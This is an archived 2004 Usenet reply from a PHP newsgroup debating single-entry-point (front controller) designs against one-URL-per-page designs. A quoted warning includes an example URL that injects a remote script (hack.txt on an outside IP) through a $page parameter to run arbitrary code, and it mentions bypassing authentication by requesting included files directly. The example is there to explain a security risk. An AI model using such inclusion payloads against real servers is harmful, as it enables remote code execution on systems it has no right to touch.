Re: Design Model Question

From: Tony Marston (tony_at_NOSPAM.demon.co.uk)
Date: 06/26/04 

Date: Sat, 26 Jun 2004 18:22:53 +0100

"Chung Leong" <chernyshevsky@hotmail.com> wrote in message
news:S7KdnSV5iPDyJEHdRVn-jA@comcast.com...
> "Mike Sutton" <sutton128@yahoo.com> wrote in message
> news:7eb017e9.0406251338.35a2900d@posting.google.com...
> >
> > The questions are:
> > Can anyone provide opinions on advantages/disadvantages to each of
> > these models?
> > Can anyone provide the correct terminology to discuss these ideas so
> > that I can look for more, relevant resources.
>
> I was just talking about this in another thread. DON'T USE THE SINGLE
ENTRY
> POINT ARCHITECTURE! It offers no advantages at all, while its
disadvantages
> are numerous. First and foremost, this architecture is one of the leading
> causes of security breach in PHP site. By setting $page to an Internet
> address (http://www.example.net/page=http://128.34.123.34/hack.txt), I can
> run arbitrary code on your server. And I can bypass your authentication
> scheme by simply typing in the address to the file that you're including
> (http://www.example.net/AccountIndex.php).
>
> People who use this kind of scheme, I dare say, don't have a strong
> programming background. Those who have programmed in C/C++ or other
> procedural languages know that you include a file to make additional
> functionalities available, not to cause something to occur. Think about
it,
> when you use require() you're just stating the file is needed by the
current
> script.
>
> The proper way to share code between script is to enclose it in functions,
> keep these in an separate file, include it where it's needed, then call
the
> functions. Or for the sake of convinence, just include it in every
script.

A single entry point architecture is sometimes known as a Front Controller
as every request goes through a single page. I much prefer having a separate
URL for each page as it gives me all the control I need without any of the
security problems. Take a look at
http://www.tonymarston.net/php-mysql/sample-application.html for a
description of a sample application which you can run online. There is also
a link to download all the code.

HTH. 

-- 
Tony Marston
http://www.tonymarston.net

Relevant Pages

  • Re: Can get LDAP to work in WorkGrp
    ... Microsoft PowerShell MVP ... Coming Soon: Windows PowerShell: TFM 2nd Ed. ... You will need to specify a Domain Controller in the binding string. ... as a user from that domain I can run the script and it works fine. ...
    (microsoft.public.scripting.vbscript)
  • Re: Gnuplot 4.2: Animated GIFs
    ... I am a bit confused about the demo script at the Gnuplot site, ... out they call a separate file "gnuplot.rot". ... All of these demos are distributed with gnuplot, ... "Are you trying to make a plot like the one at URL? ...
    (comp.graphics.apps.gnuplot)
  • Re: Newbie Advice on Schema Change
    ... but when I run the script on my Win2K ... domain controller, ... changetype: modify ... add: schemaUpdateNow ...
    (microsoft.public.windows.server.active_directory)
  • Re: Looking for "Terminate Event" in Windows Script Components???
    ... in the usual manner. ... This is a separate file ... right so would it have <script> tags referencing the "packaged" file ... The reason I ask is that there's a difference between "packaging" ...
    (microsoft.public.scripting.wsh)
  • Re: Samba Q?
    ... Since Samba is an SMB server, and cifs an SMB client, I have no idea ... However, if I cat the line from the file, copy & paste it but without the passwd portion and exec it, it then asks me for it, and its fine with that long a passwd from the interactive shell. ... Why can't I put it in the script? ... user and password stored in a separate file? ...
    (Fedora)